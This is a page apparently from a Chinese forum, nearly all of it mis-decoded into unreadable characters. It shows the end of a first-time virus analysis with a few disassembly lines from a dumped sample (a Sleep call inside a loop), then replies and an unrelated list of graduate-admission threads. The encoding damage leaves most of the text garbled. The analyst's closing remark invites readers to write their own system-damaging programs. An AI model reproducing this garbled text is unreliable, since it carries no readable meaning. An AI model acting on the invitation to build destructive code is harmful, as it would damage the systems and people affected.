00401FD3   . 50             PUSH EAX
00401FD4   . E8 39FAFFFF    CALL dumped_.00401A12
00401FD9   . 59             POP ECX
00401FDA   . 68 FA000000    PUSH 0FA                                 ; /Timeout = 250. ms
00401FDF   . FF15 1C504000  CALL DWORD PTR DS:[<&kernel32.Sleep>]    ; \Sleep
Õâô¿ì¾Í¸É»µÊÂ
00401FE5   .^E9 1DFFFFFF    JMP dumped_.00401F07
--------------------------------------------------------------------------------

ÖÁ´Ë£¬·ÖÎöÍê±Ï£¡ÖÁÓÚ²¡¶¾ÈçºÎÀûÓé¶´À´ÊµÏÖshellµÄ£¬±¾ÈËˮƽÓÐÏÞºÍһЩԭÒò²»·ÖÎöÁË£¬ÓÐÐËȤµÄ×Ô¼ºÑо¿
×îºóÉêÃ÷£¬µ½ÕâÀï´ó¼Ò×Ô¼ºÐ´Ò»¸öÆÆ»µÏµÍ³µÄ³ÌÐòÒѾ­×ã¹»ÁË£¡²»¹ýÓÉ´ËÒý·¢µÄºó¹û±¾È˲»¸ºÔðÈΣ¡

дÍê¸Ð¾õÓеã°àÃÅŪ¸«Ö®ÏУ¡²»¹ý±Ï¾¹ÊÇÎÒµÚÒ»´Î·ÖÎö²¡¶¾£¬Ô¸ºÍ´ó¼Ò¹²Ïí£¡²¡¶¾Ô­À´Èç´Ë¼òµ¥£¡
×ªÔØÇë±£³ÖÍêÕûÐÔ£¡
2Â¥2006-08-23 18:12:23
ÒÑÔÄ   »Ø¸´´ËÂ¥   ¹Ø×¢TA ¸øTA·¢ÏûÏ¢ ËÍTAºì»¨ TAµÄ»ØÌû

cjh5438

ÈÙÓþ°æÖ÷ (ÖøÃûдÊÖ)

°æÖ÷¹ËÎÊ

Â¥Ö÷Ò»°ãÓÃʲô·´»ã±à¹¤¾ß£¿¸øÍƼöÒ»ÏÂ
ÓÐÎÊÌâÇëpmÎÒ
5Â¥2006-09-22 00:02:00
ÒÑÔÄ   »Ø¸´´ËÂ¥   ¹Ø×¢TA ¸øTA·¢ÏûÏ¢ ËÍTAºì»¨ TAµÄ»ØÌû

gph-rabbit

½ð³æ (СÓÐÃûÆø)

·ÖÎöµÄºÜÏêϸ°¡£¬Â¥Ö÷£¬¶¥¡£
6Â¥2006-12-29 01:09:54
ÒÑÔÄ   »Ø¸´´ËÂ¥   ¹Ø×¢TA ¸øTA·¢ÏûÏ¢ ËÍTAºì»¨ TAµÄ»ØÌû
×î¾ßÈËÆøÈÈÌûÍÆ¼ö [²é¿´È«²¿] ×÷Õß »Ø/¿´ ×îºó·¢±í
[¿¼ÑÐ] ²ÄÁÏ292µ÷¼Á +4 éÙËÌ˼ÃÀÈË 2026-03-23 4/200 2026-03-23 23:16 by peike
[¿¼ÑÐ] ÉúÎïѧѧ˶Çóµ÷¼Á +4 СÑò˯×ÅÁË? 2026-03-23 4/200 2026-03-23 21:42 by hyzs6688
[¿¼ÑÐ] 269Çóµ÷¼Á +4 ÎÒÏë¶ÁÑÐ11 2026-03-23 4/200 2026-03-23 21:25 by pswait
[¿¼ÑÐ] ¿¼Ñл¯Ñ§308·ÖÇóµ÷¼Á +7 ÄãºÃÃ÷ÌìÄãºÃ 2026-03-23 8/400 2026-03-23 18:39 by macy2011
[¿¼ÑÐ] ²ÄÁÏÓ뻯¹¤¿¼Ñе÷¼Á +4 ‹üÈA 2026-03-22 4/200 2026-03-23 16:13 by Ò»ÐݸçFU
[¿¼ÑÐ] 08¹¤Ñ§µ÷¼Á +7 Óû§573181 2026-03-20 11/550 2026-03-23 15:47 by ÎÒ°®Ñ§Ï°Ñ§Ï°Ê¹Î
[¿¼ÑÐ] 289²ÄÁÏÓ뻯¹¤£¨085600£©BÇøÇóµ÷¼Á +3 ÕâôÃû×ÖÕ¦Ñù 2026-03-22 4/200 2026-03-22 17:56 by ÔÆÃñ´óÀîÀÏʦ
[¿¼ÑÐ] 08¹¤¿Æ 320×Ü·Ö Çóµ÷¼Á +11 À滨çóÍí·ç 2026-03-17 11/550 2026-03-22 17:42 by luoyongfeng
[¿¼ÑÐ] ÉúÎïѧµ÷¼Á +5 Surekei 2026-03-21 5/250 2026-03-22 14:39 by tcx007
[¿¼²©] ÕÐÊÕ²©Ê¿1-2ÈË +3 QGZDSYS 2026-03-18 4/200 2026-03-22 10:25 by QGZDSYS
[¿¼ÑÐ] 286·ÖÈ˹¤ÖÇÄÜרҵÇëÇóµ÷¼ÁÔ¸Òâ¿ç¿¼£¡ +4 lemonzzn 2026-03-17 8/400 2026-03-21 22:49 by lemonzzn
[¿¼ÑÐ] 0805 316Çóµ÷¼Á +3 ´óÑ©Éî²Ø 2026-03-18 3/150 2026-03-21 18:55 by ѧԱ8dgXkO
[¿¼ÑÐ] 0703»¯Ñ§µ÷¼Á +4 ÄÝÄÝninicgb 2026-03-21 4/200 2026-03-21 18:39 by ѧԱ8dgXkO
[¿¼ÑÐ] 268Çóµ÷¼Á +9 ¼òµ¥µã0 2026-03-17 9/450 2026-03-21 15:37 by lature00
[¿¼ÑÐ] 321Çóµ÷¼Á +9 ºÎÈó²É123 2026-03-18 11/550 2026-03-20 23:19 by JourneyLucky
[¿¼ÑÐ] Ò»Ö¾Ô¸ Î÷±±´óѧ £¬070300»¯Ñ§Ñ§Ë¶£¬×Ü·Ö287£¬Ë«·ÇÒ»±¾£¬Çóµ÷¼Á¡£ +4 ³¿»èÏßÓëÐǺ£ 2026-03-19 4/200 2026-03-20 22:15 by JourneyLucky
[¿¼ÑÐ] AÇøÏß²ÄÁÏѧµ÷¼Á +5 ÖÜÖÜÎÞ¼« 2026-03-20 5/250 2026-03-20 21:33 by laoshidan
[¿¼ÑÐ] ²ÄÁÏѧ˶318Çóµ÷¼Á +5 February_Feb 2026-03-19 5/250 2026-03-19 23:51 by 23Postgrad
[¿¼ÑÐ] Ò»Ö¾Ô¸Öйúº£Ñó´óѧ£¬ÉúÎïѧ£¬301·Ö£¬Çóµ÷¼Á +5 1ËïÎò¿Õ 2026-03-17 6/300 2026-03-19 23:46 by zcl123
[¿¼ÑÐ] ÊÕ¸´ÊÔµ÷¼ÁÉú +4 ÓêºóÇïºÉ 2026-03-18 4/200 2026-03-18 14:16 by elevennnne
ÐÅÏ¢Ìáʾ
ÇëÌî´¦ÀíÒâ¼û